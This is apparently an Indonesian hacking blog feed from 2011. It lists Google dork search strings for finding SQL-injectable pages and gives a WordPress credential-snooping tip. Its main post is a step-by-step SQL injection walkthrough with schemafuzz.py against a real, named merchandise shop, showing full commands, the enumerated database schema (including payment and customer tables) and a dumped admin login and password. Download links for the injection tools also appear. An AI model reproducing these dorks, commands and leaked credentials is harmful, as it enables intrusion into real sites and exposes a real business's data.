inurl:memberInfo.php?id=<br />
inurl:section.php?id=<br />
inurl:theme.php?id=<br />
inurl:page.php?id=<br />
inurl:shredder-categories.php?id=<br />
inurl:tradeCategory.php?id=<br />
inurl:product_ranges_view.php?ID=<br />
inurl:shop_category.php?id=<br />
inurl:transcript.php?id=<br />
inurl:channel_id=<br />
inurl:item_id=<br />
inurl:newsid=<br />
inurl:trainers.php?id=<br />
inurl:news-full.php?id=<br />
inurl:news_display.php?getid=<br />
inurl:index2.php?option=<br />
inurl:readnews.php?id=<br />
inurl:top10.php?cat=<br />
inurl:newsone.php?id=<br />
inurl:event.php?id=<br />
inurl:product-item.php?id=<br />
inurl:sql.php?id=<br />
inurl:aboutbook.php?id=<br />
inurl:review.php?id=<br />
inurl:loadpsb.php?id=<br />
inurl:ages.php?id=<br />
inurl:material.php?id=<br />
inurl:clanek.php4?id=<br />
inurl:announce.php?id=<br />
inurl:chappies.php?id=<br />
inurl:read.php?id=<br />
inurl:viewapp.php?id=<br />
inurl:viewphoto.php?id=<br />
inurl:rub.php?idr=<br />
inurl:galeri_info.php?l=<br />
inurl:review.php?id=<br />
inurl:iniziativa.php?in=<br />
inurl:curriculum.php?id=<br />
inurl:labels.php?id=<br />
inurl:story.php?id=<br />
inurl:look.php?ID=<br />
inurl:newsone.php?id=<br />
inurl:aboutbook.php?id=<br />
inurl:material.php?id=<br />
inurl:opinions.php?id=<br />
inurl:announce.php?id=<br />
inurl:rub.php?idr=<br />
inurl:galeri_info.php?l=<br />
inurl:tekst.php?idt=<br />
inurl:newscat.php?id=<br />
inurl:newsticker_info.php?idn=<br />
inurl:rubrika.php?idr=<br />
inurl:rubp.php?idr=<br />
inurl:offer.php?idf=<br />
inurl:art.php?idm=<br />
inurl:title.php?id=choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-35784302970268010652011-08-18T22:59:00.000-07:002011-08-18T22:59:23.651-07:00Hacking wordpresswah kirain wordpress kagak bisa di oprek eh....ternyata bisa dibilang gampang2 susah<br />
soalnya....xxxxxx (apa tuh gak tau jg)<br />
coba deh keyword google dork! "powered by wordpres" (gak pake kutip loh)<br />
tuh lu pada cari dah site<br />
contoh: http://www.xxxx.com/wp-includes/<br />
kemudian agan tambahain lagi wp-db.php jadinya seperti ini http://www.xxxx.com/wp-includes/wp-db.php , dengan berharap semoga gak ada .htacces nya hiiii....kalo agan beruntung wp-db.php akan menampilkan username ama password .....<br />
ok dah saya rasa cukup......<br />
<br />
Nb: buat para master dilarang keras membaca ini soalnya akan mengakibatkan tertwa terbahak-bahak :Dchoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-35839306676319067852011-08-05T23:26:00.000-07:002011-08-05T23:30:13.248-07:00Aplikasi Facebook Gratiswaaahhh...ini gan facebook gratis......<br />
pake facebook gratis pake broweser bawaan bosen.<br />
ini screenshotnya<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLlVYZL-s9VaZYOebKOu3n_QYH9rzNdtDlB_8T7n7Xgu63sW5bAf4EGxmhW7RzZW2TfnDSl852QGOe9eH_NcXVNf1irtlXpCdCjD2WAkSY2ZLqTSifRDw8emFZq1Tw2ScQA2wL5-Kppo/s1600/HP-facebookApp.png" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="178" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLlVYZL-s9VaZYOebKOu3n_QYH9rzNdtDlB_8T7n7Xgu63sW5bAf4EGxmhW7RzZW2TfnDSl852QGOe9eH_NcXVNf1irtlXpCdCjD2WAkSY2ZLqTSifRDw8emFZq1Tw2ScQA2wL5-Kppo/s320/HP-facebookApp.png" /></a></div><br />
nah ini bagi agan yang mau sedot via PC terus masukin di hp klik <a href="http://www.4shared.com/file/XPEO7Pfu/facebook.html" target="_blank"> disini</a><br />
kalo yang mau via handphone (hp) klik <a href="http://d.facebook.com/install ">disini</a> <br />
<br />
ayo gan....berlaku sampai 31 Oktober 2011.choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-32792101844137439762011-08-03T06:40:00.000-07:002011-08-03T06:40:20.088-07:00Tutorial Python27ini adalah kelanjutan dari Tool SQL injection dan Python dan disini kita akan bahas penggunaan python27+scripts ok!<br />
Sebelumnya sudah punya python belum kalo belum silahkan download disitus resminya <a href="Tool SQL injection dan Python" target="_blank">disini</a><br />
ok langsung sipakan pelaralatan tempur:<br />
1. minuman<br />
2. cemilan<br />
3. rokok bagi yg merokok<br />
4. kelamaan gan heee.. :D<br />
setelah agan selesai menginstal python, kemudian scripts schemafuzz.py di copy dan di paste di folder python27.<br />
Proses pengoprasian:<br />
1. buka command prompt<br />
2. kemudian masuk ke folder pyhton27 berada, ketik cmd sbb: cd c:\pyhton27 [enter]<br />
3. ok sdh masuk...C:\Python27><br />
4. lanjutkan menuliskan perintah, cmd sbb: C:\Python27>schemafuzz.py -u "url(site)" --findcol [enter]. contoh C:\Python27> schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4 --findcol [enter]<br />
maka akan muncul seperti ini:<br />
|---------------------------------------------------------------|<br />
| assasin666[@]2di4[dot]com v5.0 |<br />
| 6/2008 schemafuzz.py |<br />
| -MySQL v5+ Information_schema Database Enumeration |<br />
| -MySQL v4+ Data Extractor |<br />
| -MySQL v4+ Table & Column Fuzzer |<br />
| Usage: schemafuzz.py [options] |<br />
| -h help Blackhat|<br />
|---------------------------------------------------------------|<br />
<br />
[+] URL:http://www.merchandisingf1.com/en/news.php?id=4--<br />
[+] Evasion Used: "+" "--"<br />
[+] 15:58:10<br />
[+] Proxy Not Given<br />
[+] Attempting To find the number of columns...<br />
[+] Testing: 0,1,2,3,4,5,6,7,8,<br />
[+] Column Length is: 9<br />
[+] Found null column at column #: 3<br />
[+] SQLi URL: http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--<br />
[+] dimensi URL: http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8<br />
[-] Done!<br />
<br />
nah dalam yg satu ini kita gunakan yg ini: http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 yg siap kita injeksi<br />
<br />
5. sekarang kita mencari databasenya dgn perintah sbb: C:\Pyhton27>schemafuzz.py -u "url(site)" --dbs. contoh: C:\Pyhton27>schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 --dbs [enter]<br />
nah seharusnya muncul seperti demikian:<br />
|---------------------------------------------------------------|<br />
| assasin666[@]2di4[dot]com v5.0 |<br />
| 6/2008 schemafuzz.py |<br />
| -MySQL v5+ Information_schema Database Enumeration |<br />
| -MySQL v4+ Data Extractor |<br />
| -MySQL v4+ Table & Column Fuzzer |<br />
| Usage: schemafuzz.py [options] |<br />
| -h help Blackhat|<br />
|---------------------------------------------------------------|<br />
<br />
[+] URL:http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8--<br />
[+] Evasion Used: "+" "--"<br />
[+] 16:01:33<br />
[+] Proxy Not Given<br />
[+] Gathering MySQL Server Configuration...<br />
Database: merchand_main<br />
User: merchand_userm@localhost<br />
Version: 5.1.47<br />
[+] Showing all databases current user has access too!<br />
[+] Number of Databases: 2<br />
<br />
[0] merchand_main <br />
[1] test <br />
<br />
[-] [16:02:34]<br />
[-] Total URL Requests 4<br />
[-] Done<br />
<br />
6. hemmm..sdh kelihatan databasenya kan...ok gan lanjut ke step selanjutnya mencari nama table dalam database, perintah cmd sbb: C:\Pyhton27>schemafuzz.py -u "url(site)" --schema -D database name, contoh: C:\Python27>schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 --schema -D merchand_main [enter], maka muncul seperti demikian:<br />
|---------------------------------------------------------------|<br />
| assasin666[@]2di4[dot]com v5.0 |<br />
| 6/2008 schemafuzz.py |<br />
| -MySQL v5+ Information_schema Database Enumeration |<br />
| -MySQL v4+ Data Extractor |<br />
| -MySQL v4+ Table & Column Fuzzer |<br />
| Usage: schemafuzz.py [options] |<br />
| -h help Blackhat|<br />
|---------------------------------------------------------------|<br />
<br />
[+] URL:http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8--<br />
[+] Evasion Used: "+" "--"<br />
[+] 16:09:28<br />
[+] Proxy Not Given<br />
[+] Gathering MySQL Server Configuration...<br />
Database: merchand_main<br />
User: merchand_userm@localhost<br />
Version: 5.1.47<br />
[+] Showing Tables & Columns from database "merchand_main"<br />
[+] Number of Tables: 34<br />
<br />
[Database]: merchand_main<br />
[Table: Columns]<br />
[0]bankpass: id,NUMORD,IDNEGOZIO,AUT,IMPORTO,VALUTA,IDTRANS,MAC,ESITO,TAUTOR,TCONTAB,CARTA<br />
[1]cataloghi: cata_id,cata_titolo,cata_titolo_en,cata_file,cata_posizione<br />
[2]categorie: cat_id,cat_nome,cat_nome_en,cat_tipo,cat_ordine,cat_url,cat_titlepage,cat_titlepage_en,cat_vis<br />
[3]clienti: cl_id,cl_codice,cl_classe,cl_ragsoc,cl_cognome,cl_nome,cl_sede_ind,cl_sede_citta,cl_sede_prov,cl_sede_cap,cl_nazione,cl_tel,cl_fax,cl_piva,cl_email,cl_url,cl_contatto,cl_sped_ind,cl_sped_citta,cl_sped_prov,cl_sped_cap,cl_privacy,cl_vis_cond,cl_acc_cond,cl_optin,cl_login,cl_password,cl_permessi<br />
[4]comuni: IDCOMUNE,COMUNE,IDPRO,CAP,SUFFISSO,CATASTALE<br />
[5]corrieri: corr_id,corr_nome,corr_tel,corr_url<br />
[6]dettordini: do_id,do_ord_id,do_prod_id,do_cat_id,do_nome,do_colore,do_taglia,do_qta,do_pr,do_pr_tot<br />
[7]doblone: dob_id,dob_file,dob_cat,dob_pos<br />
[8]links: lin_id,lin_cat_id,lin_url,lin_title_it,lin_title_en,lin_text_it,lin_text_en,lin_stat,lin_ordine<br />
[9]links_cat: lincat_id,lincat_title_it,lincat_title_en,lincat_order<br />
[10]mll_categories_ctg: id_ctg,name_ctg,visible_ctg<br />
[11]mll_categrecip_crp: id_crp,idctg_crp,idrcp_crp<br />
[12]mll_lock_lck: id_lck,timestamp_lck<br />
[13]mll_mailhistory_mhi: id_mhi,idmal_mhi,idsbd_mhi,sentdate_mhi<br />
[14]mll_mailing_mal: id_mal,idrcp_mal,idtem_mal,idmst_mal,name_mal,creationdate_mal,sender_mal,replyto_mal,subject_mal,sendbcc_mal,sentno_mal,hit_mal,attname_mal,atttype_mal,usermessagehtml_mal,usermessagetext_mal,lock_mal,lockdate_mal<br />
[15]mll_mailingstatus_mst: id_mst,name_mst,default_mst<br />
[16]mll_mailque_mqu: id_mqu,idmal_mqu,idsbd_mqu,idtst_mqu,sent_mqu,sentdate_mqu,random_mqu<br />
[17]mll_readmails_rem: id_rem,idsbd_rem,idmal_rem,readdate_rem<br />
[18]mll_recipients_rcp: id_rcp,name_rcp<br />
[19]mll_subscrcateg_sct: id_sct,idsbd_sct,idctg_sct<br />
[20]mll_subscribed_sbd: id_sbd,firstname_sbd,lastname_sbd,email_sbd,adress_sbd,mailtype_sbd,active_sbd,password_sbd,failed_sbd,privacy<br />
[21]mll_templates_tem: id_tem,idtst_tem,name_tem,subject_tem,sourcehtml_tem,sourcetext_tem,active_tem<br />
[22]mll_templstatus_tst: id_tst,name_tst,default_tst<br />
[23]mll_users_usr: id_usr,username_usr,password_usr,admin_usr,email_usr,testmail_usr,sender_usr,replyto_usr<br />
[24]modulo: mod_id,mod_titolo,mod_titolo_en,mod_testo,mod_testo_en,mod_file<br />
[25]news: news_id,news_data,news_titolo,news_titolo_en,news_abstract,news_abstract_en,news_testo,news_testo_en,news_immagine<br />
[26]opzioni: opz_id,opz_nome,opz_nome_eng,opz_ordine<br />
[27]opzioni_prod: opzprod_id,opzprod_opz_id,opzprod_prod_id<br />
[28]ordini: ord_id,ord_cl_id,ord_data,ord_spese,ord_totale,ord_IVA,ord_totale_IVA,ord_pr_trasp,ord_note,ord_stato,ord_corr_id,ord_track_n,ord_data_sped,ord_payment,NUMORD<br />
[29]paypal_txns: id,txn_id,item_name,item_number,payment_status,payment_amount,payment_currency,receiver_email,payer_email<br />
[30]prodotti: prod_id,prod_cat_id,prod_codice,prod_nome,prod_nome_en,prod_descr,prod_descr_en,prod_colore,prod_colore_en,prod_prezzo_p,prod_prezzo_r,prod_disponib,prod_foto_fr,prod_foto_re,prod_det1,prod_det2,prod_det3,prod_taglia_xs,prod_taglia_s,prod_taglia_m,prod_taglia_l,prod_taglia_xl,prod_taglia_xxl,prod_prior<br />
[31]sella_txns: id,id_ordine,esito,data<br />
[32]statord: st_id,st_stato,st_stato_en,st_note<br />
[33]trasporto: tras_id,tras_tipo_it,tras_tipo_en,tras_prezzo,tras_cat,tras_add<br />
<br />
[-] [16:40:00]<br />
[-] Total URL Requests 257<br />
[-] Done<br />
<br />
7.nah tuh banyak yg keliatan agan perkosa aja gih biar ketahuan heee :P , ok langsung saja yg terakhir dgn perintah cmd sbb: C:\Pyhton27>schemafuzz.py -u "url(site)" --dump -D database name -T table -C kolom [enter], contoh: C:\Pyhton27>schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 --dump -D database name -T mll_users_usr -C id_usr,username_usr,password_usr,admin_usr,email_usr,testmail_usr,sender_usr,replyto_usr [enter] nah maka nampak seperti ini:<br />
|---------------------------------------------------------------|<br />
| assasin666[@]2di4[dot]com v5.0 |<br />
| 6/2008 schemafuzz.py |<br />
| -MySQL v5+ Information_schema Database Enumeration |<br />
| -MySQL v4+ Data Extractor |<br />
| -MySQL v4+ Table & Column Fuzzer |<br />
| Usage: schemafuzz.py [options] |<br />
| -h help Blackhat|<br />
|---------------------------------------------------------------|<br />
<br />
[+] URL:http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8--<br />
[+] Evasion Used: "+" "--"<br />
[+] 16:47:35<br />
[+] Proxy Not Given<br />
[+] Gathering MySQL Server Configuration...<br />
Database: merchand_main<br />
User: merchand_userm@localhost<br />
Version: 5.1.47<br />
[+] Dumping data from database "merchand_main" Table "mll_users_usr"<br />
[+] Column(s) ['id_usr', 'username_usr', 'password_usr', 'admin_usr', 'email_usr', 'testmail_usr', 'sender_usr', 'replyto_usr']<br />
[+] Number of Rows: 1<br />
<br />
[0] 1:admin:admin:9:info@merchandisingf1.com:cera@fcea.it:newsletter@merchandisingf1.com:newsletter@merchandisingf1.com:<br />
<br />
ok gan cukup sekian penjelasan dari kami, gunakanlah dengan bijak dan Cyberzoid tidak bertanggung jawab bila nanti agan jadi jahat :pchoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-30190403263231681032011-08-03T02:52:00.000-07:002011-08-03T02:55:10.786-07:00Aplikasi IRC mobileNah ini dia gan....yang pada males online irc via PC, kami cyberzoid menyediakan untuk mobile phone (hp)<br />
bagi yang berminat bisa sedot langsung aja gan.....<br />
1. <a href="http://www.4shared.com/file/W_TIsd4P/Cyberzoid.html" target="_blank">Cyberzoid</a><br />
2. <a href="http://www.4shared.com/file/Cf9Hh3hN/Cyberzoid-x.html" target="_blank">Cyberzoid-x</a><br />
3. <a href="http://www.4shared.com/file/Tbg2V4mb/islamirc.html" target="_blank">islamirc</a><br />
4. <a href="http://www.4shared.com/file/AeGnOZsV/jedirc32midp2.html" target="_blank">jedirc32</a><br />
5. <a href="http://www.4shared.com/file/nuRz-X1u/snirc.html" target="_blank">snirc</a><br />
6. <a href="http://www.4shared.com/file/l6IioGX4/xirc.html" target="_blank">xirc</a><br />
7. <a href="http://www.4shared.com/file/MEoCyAwB/wlirc2.html" target="_blank">wlirc</a><br />
8. <a href="http://www.4shared.com/file/6RS79rUu/kirc.html" target="_blank">kirc</a><br />
9. <a href="http://www.4shared.com/file/okzBenwg/jmirc-m.html" target="_blank">jmirc-m</a><br />
10. <a href="http://www.4shared.com/file/KDn84zEt/barabazirc.html" target="_blank">barabazirc</a><br />
<br />
catatan sedikit sebaiknya jika mendownload lewat hp gunakan browser bawaanchoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-14518155554535812562011-08-02T05:10:00.000-07:002011-08-02T05:22:47.832-07:00Tool SQL injection dan PythonSebenarnya tool SQL injection dan python saling membutuhkan........dimana si python ini yaa kalo mau digunain misalnya masih dalam SQL injection, kita diharuskan mencari web yang vulnerability, apa sih vulnerability itu? yaitu kelemahan sebuah sistem...... :) . Dalam hal ini python yang sudah memiliki script schemafuzz dapat berjalan karena tadi web yang memiliki vulnerability. Amat sangat merepotakan kalo kita mencari satu2 trus dicek lagi huffttt....yang ada cepek dehh... :D. Dengan adanya tool SQL injection kita hanya perlu memasukan sebuah site sebagai contoh: "hhttp://www.merchandisingf1.com/en/news.php?id" kemudian cek vulnerability.... ternyata ok. diteruskan "scan colom" sampai berhenti dan stop. ini hasil yg diperoleh: hhttp://www.merchandisingf1.com/en/news.php?id=null union all select 1,2,3,4,5,6,7,8,9--<br />
ini dia screenshot SQL injection<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_CSRqXvp5srUHqlX24GhnAyGqEoGtCRgOnigOzx25BMWPY9AuNescArhZeTf0SwAW9yTe378vZZ3s-m2wBMinxn5RnxVTB7eQnoOA0OVdR8B_YbpCNWVlzq3ueBygOAR7r-sVOQWjSak/s1600/sql.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="194" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_CSRqXvp5srUHqlX24GhnAyGqEoGtCRgOnigOzx25BMWPY9AuNescArhZeTf0SwAW9yTe378vZZ3s-m2wBMinxn5RnxVTB7eQnoOA0OVdR8B_YbpCNWVlzq3ueBygOAR7r-sVOQWjSak/s320/sql.jpg" /></a></div><br />
kemudian kita teruskan ke python27<br />
untuk SQL injection bisa di download <a href="http://www.mediafire.com/?wjenejamkmj" target="_blank">disini</a><br />
untuk Script Schemafuzz dapat di download <a href="http://www.4shared.com/file/MsGagRaN/schemafuzz.html" target="_blank">disini</a><br />
sedangkan untuk penjelasan menggunakan python akan menyusulchoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com1